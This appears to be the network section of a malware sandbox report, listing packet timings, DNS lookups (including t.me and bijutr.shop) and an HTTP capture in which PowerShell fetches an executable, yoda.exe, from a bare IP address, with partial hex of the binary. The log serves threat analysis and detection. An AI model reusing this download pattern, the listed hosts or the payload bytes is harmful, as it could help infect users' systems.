Dec 27, 2024 07:10:58.011615038 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:58.335197926 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.341167927 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.341226101 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.341280937 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.341293097 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.341546059 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:58.350934982 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:58.681288958 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.694813967 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.694850922 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.694931030 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.694947004 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.694962978 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.695072889 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.695089102 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.695105076 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.695120096 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:58.695142984 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:58.711935997 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:59.035634041 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.041207075 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.041568041 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:59.042053938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042097092 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042114019 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042258024 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042273998 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042289019 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042304993 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042505980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042521000 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042536974 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042551994 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042568922 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042752981 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042768002 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042784929 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.042799950 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.043392897 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:59.065212965 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:59.388974905 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395174026 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395395994 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395494938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395512104 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395530939 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395654917 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395675898 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395693064 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395709038 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395833969 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395848036 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.395860910 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.404758930 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:59.405038118 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:59.430380106 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:59.767571926 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:59.847776890 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.173516035 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.177660942 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.177714109 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.177771091 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.177860022 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178067923 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178123951 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178136110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178277016 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178287983 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178298950 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178312063 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178565025 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178575993 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178587914 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178599119 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178611040 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178625107 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178634882 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.178647041 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.190767050 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.190872908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.191376925 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.191436052 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.191447020 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.194835901 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.195038080 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.197974920 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.270776987 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.412534952 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.542963028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.736265898 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.740371943 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.740699053 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.740706921 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.740753889 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.740871906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.740935087 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.740947008 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741065979 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741087914 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741205931 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741223097 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741233110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741245985 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741257906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741391897 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741400957 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:00.741780996 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.772285938 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:00.773077011 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:01.088247061 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.097198963 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.104800940 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.104871035 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.104960918 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.104978085 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.104993105 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.105072021 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.105084896 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:01.105098963 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:01.140743971 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:01.452641964 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:10.018938065 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:10.342819929 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:10.347199917 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:10.347213030 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:10.347292900 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:10.847414017 CET	443	58828	23.209.72.7	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 27, 2024 07:09:58.587625980 CET	192.168.2.5	1.1.1.1	c234	(Port unreachable)	Destination Unreachable
Dec 27, 2024 07:10:39.076126099 CET	192.168.2.5	1.1.1.1	c24a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 07:09:24.440046072 CET	192.168.2.5	1.1.1.1	0x8f85	Standard query (0)	pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:39.314806938 CET	192.168.2.5	1.1.1.1	0xc4f6	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:41.891535997 CET	192.168.2.5	1.1.1.1	0x4f4a	Standard query (0)	bijutr.shop	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:58.232934952 CET	192.168.2.5	1.1.1.1	0x92fc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:58.233182907 CET	192.168.2.5	1.1.1.1	0x462e	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:33.357306004 CET	192.168.2.5	1.1.1.1	0x21d3	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:33.373766899 CET	192.168.2.5	1.1.1.1	0xf38e	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:35.744559050 CET	192.168.2.5	1.1.1.1	0xf441	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:35.745157003 CET	192.168.2.5	1.1.1.1	0x9571	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Dec 27, 2024 07:10:37.478427887 CET	192.168.2.5	1.1.1.1	0x66	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:37.478605032 CET	192.168.2.5	1.1.1.1	0x145c	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:37.862890005 CET	192.168.2.5	1.1.1.1	0x348a	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:37.863223076 CET	192.168.2.5	1.1.1.1	0xc282	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:37.863605976 CET	192.168.2.5	1.1.1.1	0x27eb	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:37.863750935 CET	192.168.2.5	1.1.1.1	0x1b08	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:37.886658907 CET	192.168.2.5	1.1.1.1	0xe9f3	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:37.887083054 CET	192.168.2.5	1.1.1.1	0xdfb8	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:38.731089115 CET	192.168.2.5	1.1.1.1	0x1963	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.731287956 CET	192.168.2.5	1.1.1.1	0xc430	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:38.741051912 CET	192.168.2.5	1.1.1.1	0xa4f0	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.741228104 CET	192.168.2.5	1.1.1.1	0x45a	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:38.871476889 CET	192.168.2.5	1.1.1.1	0x7499	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.871628046 CET	192.168.2.5	1.1.1.1	0x5a9a	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Dec 27, 2024 07:10:39.011487961 CET	192.168.2.5	1.1.1.1	0x1f04	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:39.011720896 CET	192.168.2.5	1.1.1.1	0x2eec	Standard query (0)	api.msn.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 07:09:24.770004034 CET	1.1.1.1	192.168.2.5	0x8f85	Name error (3)	pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:39.451478004 CET	1.1.1.1	192.168.2.5	0xc4f6	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:42.369208097 CET	1.1.1.1	192.168.2.5	0x4f4a	No error (0)	bijutr.shop		188.245.216.205	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:58.468173981 CET	1.1.1.1	192.168.2.5	0x92fc	No error (0)	www.google.com		172.217.21.36	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:09:58.468203068 CET	1.1.1.1	192.168.2.5	0x462e	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 27, 2024 07:10:33.500508070 CET	1.1.1.1	192.168.2.5	0x21d3	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:33.511389971 CET	1.1.1.1	192.168.2.5	0xf38e	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:33.608705997 CET	1.1.1.1	192.168.2.5	0x9969	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:33.608705997 CET	1.1.1.1	192.168.2.5	0x9969	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:33.611634016 CET	1.1.1.1	192.168.2.5	0x2aad	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:35.882795095 CET	1.1.1.1	192.168.2.5	0xf441	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:35.883014917 CET	1.1.1.1	192.168.2.5	0x9571	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:37.615874052 CET	1.1.1.1	192.168.2.5	0x66	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:37.615874052 CET	1.1.1.1	192.168.2.5	0x66	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.65	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:37.616055965 CET	1.1.1.1	192.168.2.5	0x145c	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:37.999526978 CET	1.1.1.1	192.168.2.5	0x348a	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:37.999526978 CET	1.1.1.1	192.168.2.5	0x348a	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.000108957 CET	1.1.1.1	192.168.2.5	0xc282	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 27, 2024 07:10:38.000216961 CET	1.1.1.1	192.168.2.5	0x1b08	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 27, 2024 07:10:38.000690937 CET	1.1.1.1	192.168.2.5	0x27eb	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.000690937 CET	1.1.1.1	192.168.2.5	0x27eb	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.023901939 CET	1.1.1.1	192.168.2.5	0xe9f3	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.023901939 CET	1.1.1.1	192.168.2.5	0xe9f3	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.024750948 CET	1.1.1.1	192.168.2.5	0xdfb8	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 27, 2024 07:10:38.868554115 CET	1.1.1.1	192.168.2.5	0x1963	No error (0)	sb.scorecardresearch.com		18.165.220.106	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.868554115 CET	1.1.1.1	192.168.2.5	0x1963	No error (0)	sb.scorecardresearch.com		18.165.220.66	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.868554115 CET	1.1.1.1	192.168.2.5	0x1963	No error (0)	sb.scorecardresearch.com		18.165.220.110	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.868554115 CET	1.1.1.1	192.168.2.5	0x1963	No error (0)	sb.scorecardresearch.com		18.165.220.57	A (IP address)	IN (0x0001)	false
Dec 27, 2024 07:10:38.877861977 CET	1.1.1.1	192.168.2.5	0xa4f0	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:38.878243923 CET	1.1.1.1	192.168.2.5	0x45a	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:39.009432077 CET	1.1.1.1	192.168.2.5	0x7499	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:39.076011896 CET	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:39.147943020 CET	1.1.1.1	192.168.2.5	0x1f04	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:39.148962975 CET	1.1.1.1	192.168.2.5	0x2eec	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:41.620476961 CET	1.1.1.1	192.168.2.5	0x1c89	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 07:10:41.620476961 CET	1.1.1.1	192.168.2.5	0x1c89	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

bijutr.shop

www.google.com

chrome.cloudflare-dns.com

clients2.googleusercontent.com

https:

sb.scorecardresearch.com

browser.events.data.msn.com

c.msn.com

5.252.155.64

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	5.252.155.64	80	3720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 07:09:16.240854979 CET	165	OUT	GET /yoda.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 5.252.155.64 Connection: Keep-Alive
Dec 27, 2024 07:09:17.709877968 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 06:09:17 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 20 Dec 2024 08:06:15 GMT ETag: "d0618-629af1ef17b5e" Accept-Ranges: bytes Content-Length: 853528 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 ac 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 50 10 00 00 04 00 00 4c 30 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8@PL0@@;H`.textrt `.rdatan+,x@@.data+@.ndata.rsrc;<@@.reloc@@B
Dec 27, 2024 07:09:17.709892988 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu@eEEPu@}eD@FRVVU+MM
Dec 27, 2024 07:09:17.709903002 CET	288	IN	Data Raw: 00 00 56 83 e1 0f ff 34 8a 05 e8 c0 40 00 50 e8 a9 53 00 00 83 7c 24 08 00 8b f0 7d 06 56 e8 cd 4b 00 00 8b c6 5e c2 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 90 eb 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 90 40 00 3b Data Ascii: V4@PS\|$}VK^USVWEPGP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5Guuu@3@_^[9Guuu@uU@@Vt
Dec 27, 2024 07:09:17.709913969 CET	1236	IN	Data Raw: c0 f7 d0 23 45 08 5e 5d c2 04 00 cc 55 8b ec 81 ec ac 03 00 00 a1 b4 ea 47 00 53 56 8b 75 08 57 6a 07 59 8d 7d d0 f3 a5 8b 55 d4 8b 4d d8 8b f2 8b f9 69 f6 08 40 00 00 69 ff 08 40 00 00 89 45 f4 b8 00 f0 47 00 03 f0 03 f8 8d 45 d4 a3 e4 c0 40 00 Data Ascii: #E^]UGSVuWjY}UMi@i@EGE@E3]G$0@Rh@LEYYS@Ph@LYYSul9tjG9]tS<@R(pVh@kLYYSV0\|SPh`@LLYYS
Dec 27, 2024 07:09:17.709925890 CET	1236	IN	Data Raw: 00 56 e8 c6 45 00 00 50 e8 d9 4c 00 00 50 e8 d6 45 00 00 56 e8 e3 45 00 00 bf f8 40 41 00 83 7d 08 03 7c 31 56 e8 6f 48 00 00 33 c9 3b c3 74 10 8d 4d e0 51 83 c0 14 50 ff 15 64 90 40 00 8b c8 8b 45 08 83 c0 fd 0d 00 00 00 80 23 c1 f7 d8 1b c0 40 Data Ascii: VEPLPEVE@A}\|1VoH3;tMQPd@E#@E9]uVC3}@Ph@VCE9]uwVh@GYYhGW.EVhG#EuhAMWhGEEPhAAuhp@GY6Ht@h@@rG
Dec 27, 2024 07:09:17.710232973 CET	1236	IN	Data Raw: 8d 47 04 50 56 e8 ef 40 00 00 8b 07 a3 e0 c0 40 00 57 e9 34 04 00 00 68 0c 40 00 00 6a 40 ff 15 24 91 40 00 ff 75 d4 8b f0 8d 46 04 50 e8 c3 48 00 00 a1 e0 c0 40 00 89 06 89 35 e0 c0 40 00 e9 63 11 00 00 6a 03 59 e8 be f4 ff ff 6a 04 59 89 45 cc Data Ascii: GPV@@W4h@j@$@uFPH@5@cjYjYEEEtj3EEtjDE}!uJ3AjYxM;tURQSuuPWL@@ECuuPW@0jOjF#Q#Puu
Dec 27, 2024 07:09:17.710246086 CET	1236	IN	Data Raw: f0 ff ff 89 45 f8 39 5d e4 74 0e 57 ff 15 34 91 40 00 89 45 08 3b c3 75 15 6a 08 53 57 ff 15 38 91 40 00 89 45 08 3b c3 0f 84 90 00 00 00 ff 75 f8 ff 75 08 e8 48 3f 00 00 8b f0 3b f3 74 3d 89 5d fc 39 5d dc 74 17 ff 75 dc e8 d6 ef ff ff ff d6 85 Data Ascii: E9]tW4@E;ujSW8@E;uuH?;t=]9]tutBE9h@h@hGh uuj+WuhX@+>9]3u,#u<@hAjWh@rhAjh@jZj
Dec 27, 2024 07:09:17.710258007 CET	1236	IN	Data Raw: 07 01 00 00 89 5d f8 bf f8 40 41 00 39 75 f0 75 42 6a 23 e8 60 eb ff ff 57 e8 49 37 00 00 57 ff 75 f4 8d 44 00 02 ff 75 08 89 45 f8 ff 75 cc 39 75 ec 75 12 68 e4 94 40 00 e8 ad 39 00 00 83 c4 14 e9 84 00 00 00 68 98 94 40 00 e8 9b 39 00 00 83 c4 Data Ascii: ]@A9uuBj#`WI7WuDuEu9uuh@9h@9j^9uu'jYPu@AuuuhH@l9}uBhWSuPWEhP8Puuuh@$9$uWuSuu@u]uuuh
